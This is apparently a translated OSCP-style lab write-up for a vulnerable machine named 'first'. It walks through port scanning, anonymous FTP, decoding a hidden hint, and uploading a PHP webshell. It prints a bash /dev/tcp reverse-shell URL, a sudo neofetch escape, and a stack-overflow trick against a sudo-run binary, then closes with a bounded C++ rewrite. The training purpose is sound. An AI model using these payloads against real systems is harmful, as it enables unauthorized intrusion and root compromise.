OSCP Lab
Lab overview
Name | Difficulty | Techniques
first | easy | FTP abuse, Stegseek, file upload, hex decoding, reversing an ELF with IDA/Ghidra, buffer-overflow privilege escalation
Information gathering
Host discovery
nmap -sn 192.168.1.0/24
Port scan
┌──(root㉿kali)-[~]
└─# nmap -sV -A -p- -T4 192.168.1.43
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-20 23:41 EST
Nmap scan report for 192.168.1.43
Host is up (0.00073s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxr-xr-x 2 0 0 4096 Aug 09 2022 fifth
| drwxr-xr-x 2 0 0 4096 Aug 10 2022 first
| drwxr-xr-x 2 0 0 4096 Aug 09 2022 fourth
| drwxr-xr-x 2 0 0 4096 Aug 09 2022 seccond
|_drwxr-xr-x 2 0 0 4096 Aug 09 2022 third
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.1.129
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 b8:57:5b:81:5a:78:1f:d6:ff:60:39:bb:32:a8:5d:cd (RSA)
| 256 65:8d:43:ec:63:77:d0:39:c0:1b:3e:40:d9:53:1e:ed (ECDSA)
|_ 256 0f:02:ac:df:e1:31:3c:b2:59:f6:b7:59:09:f1:ff:f8 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:1F:16:FA (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.73 ms 192.168.1.43
Directory scan
gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt -u http://192.168.1.43 -x html,php,txt -e
Initial access
FTP allows anonymous login, so we fetch the image from the FTP share and extract the hidden (steganographic) message from it:
┌──(root㉿kali)-[~]
└─# echo "SGkgSSBoYWQgdG8gY2hhbmdlIHRoZSBuYW1lIG9mIHRoZSB0b2RvIGxpc3QgYmVjb3VzZSBkaXJlY3RvcnkgYnVzdGluZyBpcyB0b28gZWFzeSB0aGVlc2UgZGF5cyBhbHNvIEkgZW5jb2RlZCB0aGlzIGluIGJlc2E2NCBiZWNvdXNlIGl0IGlzIGNvb2wgYnR3IHlvdXIgdG9kbyBsaXN0IGlzIDogMmYgNzQgMzAgNjQgMzAgNWYgNmMgMzEgNzMgNzQgNWYgNjYgMzAgNzIgNWYgNjYgMzEgNzIgMzUgNzQgZG8gaXQgcXVpY2sgd2UgYXJlIHZ1bG5hcmFibGUgZG8gdGhlIGZpcnN0IGZpcnN0IA==" | base64 -d
Hi I had to change the name of the todo list becouse directory busting is too easy theese days also I encoded this in besa64 becouse it is cool btw your todo list is : 2f 74 30 64 30 5f 6c 31 73 74 5f 66 30 72 5f 66 31 72 35 74 do it quick we are vulnarable do the first first
Decode the hexadecimal:
2f 74 30 64 30 5f 6c 31 73 74 5f 66 30 72 5f 66 31 72 35 74
which yields the to-do list: the hidden directory /t0d0_l1st_f0r_f1r5t.
Scan that directory again to find the file upload endpoint.
Upload the webshell directly and use it to spawn a reverse shell:
http://192.168.1.43/t0d0_l1st_f0r_f1r5t/uploads/1.php?cmd=bash+-c+%27bash+-i+%3E%26/dev/tcp/192.168.1.129/8989+0%3E%261%27
python3 -c 'import pty;pty.spawn("/bin/bash")'
or
script /dev/null -c bash
Ctrl + Z
stty raw -echo ;fg
stty rows 38 columns 116
export TERM=xterm
Privilege escalation
sudo -l shows that www-data may run neofetch as user first without a password; GTFOBins documents the escape through a custom config file:
https://gtfobins.github.io/gtfobins/neofetch/
www-data@first:/tmp$ cat $TF
exec /bin/sh
www-data@first:/tmp$ echo "exec /bin/sh" > shell
www-data@first:/tmp$ sudo -u first /bin/neofetch --config ./shell
$ id
uid=1000(first) gid=1000(first) groups=1000(first),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)
$ whoami
first
$ script /dev/null -c bash
Script started, file is /dev/null
first@first:/tmp$ ls
shell tmp.0cm8LMj6Sc tmp.DiFT6Jhhi4
first@first:/tmp$
Checking sudo again as first shows that the following program can be run without a password; when executed, it asks for a password of its own.
first@first:/tmp$ sudo -l
Matching Defaults entries for first on first:
env_reset, mail_badpass,
secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
User first may run the following commands on first:
(ALL) NOPASSWD: /bin/secret
# on the target: copy the binary to /tmp and serve it over HTTP
cp /bin/secret /tmp
cd /tmp
python3 -m http.server
# on the attacking machine: fetch it for analysis
wget http://192.168.1.43:8000/secret
`file` reports an ELF binary; after downloading it we decompile it with IDA.
In the listing, local_c is set to 0 and the system() branch is reached only when it is non-zero. The password buffer local_16 is 10 bytes and is filled by an unbounded std::cin >> read, so input longer than 10 characters runs past the buffer and overwrites local_c, which sits immediately after it on the stack (the offsets encoded in the variable names, 0x16 and 0xc, differ by exactly the 10-byte buffer size). This is the buffer-overflow hint from the FTP message: entering more than 10 characters turns "wrong" into "correct", and because /bin/secret runs under sudo, the command then handed to system() executes as root.
undefined8 main(void)
{
    char local_88 [114];
    char local_16 [10];
    int local_c;

    std::operator<<((basic_ostream *)std::cout,"pass: ");
    local_c = 0;
    std::operator>>((basic_istream *)std::cin,local_16);
    if (local_c == 0) {
        std::operator<<((basic_ostream *)std::cout,"wrong");
    }
    else {
        std::operator<<((basic_ostream *)std::cout,"correct, input command:");
        std::operator>>((basic_istream *)std::cin,local_88);
        system(local_88);
    }
    return 0;
}
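As an added example (not code from the lab or from the binary above), here is a bounded rewrite of the decompiled main(): the password is read with std::setw so it can never exceed the 10-byte buffer, over-long input is reported as a rejected attempt instead of silently flipping a flag, and the command is returned rather than passed to system(). The expected password s3cr3t, the Result struct and the helper names are assumptions made for this example.

```cpp
// Added example, not the lab's /bin/secret: a bounded rewrite of the
// decompiled main() above. The original reads the password with an
// unbounded `std::cin >> char_array`, so input longer than the 10-byte
// buffer runs into the neighbouring flag. This version cannot overflow,
// treats over-long input as a rejected attempt, and never spawns a shell.
#include <cctype>
#include <cstddef>
#include <iomanip>
#include <iostream>
#include <sstream>
#include <string>

// Hypothetical values: the real binary's password is not shown on the page;
// the buffer size matches `char local_16 [10]` in the decompiled listing.
const char* const EXPECTED_PASS = "s3cr3t";
const std::size_t PASS_BUF = 10;

// What one run of the check decided. `command` is what the original program
// would have handed to system(); here it is only returned, never executed.
struct Result {
    bool authenticated;
    bool overflow_attempt;
    std::string command;
};

// Hardened equivalent of the decompiled main().
Result checked_prompt(std::istream& in) {
    Result r{false, false, ""};
    char pass[PASS_BUF + 1] = {0};

    // std::setw(N) makes operator>> store at most N-1 characters plus the
    // terminating NUL; anything beyond that stays unread in the stream.
    in >> std::setw(static_cast<int>(PASS_BUF + 1)) >> pass;

    // If the next unread character is not whitespace (or end of input), the
    // caller typed more than the buffer holds. In the original binary this is
    // exactly the point where local_c would already have been overwritten.
    int next = in.peek();
    if (next != std::char_traits<char>::eof() &&
        !std::isspace(static_cast<unsigned char>(next))) {
        r.overflow_attempt = true;
        return r;
    }

    // The decision is a real string comparison, not a flag that shares the
    // stack with the input buffer.
    if (std::string(pass) == EXPECTED_PASS) {
        r.authenticated = true;
        std::getline(in >> std::ws, r.command);
    }
    return r;
}

// Convenience wrapper so the check can be exercised on an in-memory string.
Result run_on(const std::string& input) {
    std::istringstream in(input);
    return checked_prompt(in);
}

int main() {
    std::cout << "pass: ";
    Result r = checked_prompt(std::cin);
    if (r.overflow_attempt) {
        std::cout << "input too long, rejected\n";
    } else if (!r.authenticated) {
        std::cout << "wrong\n";
    } else {
        std::cout << "correct, would run: " << r.command << "\n";
    }
    return 0;
}
```

Compile with g++ -std=c++17 and feed it a 20-character password: the rewrite answers "input too long, rejected" where the original prints "correct". Using std::string for the password (which grows to fit) also removes the overflow; keeping an explicit size makes the rejected-attempt path visible for logging.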
End
Originally published on the WeChat public account 贝雷帽SEC: 【OSCP】first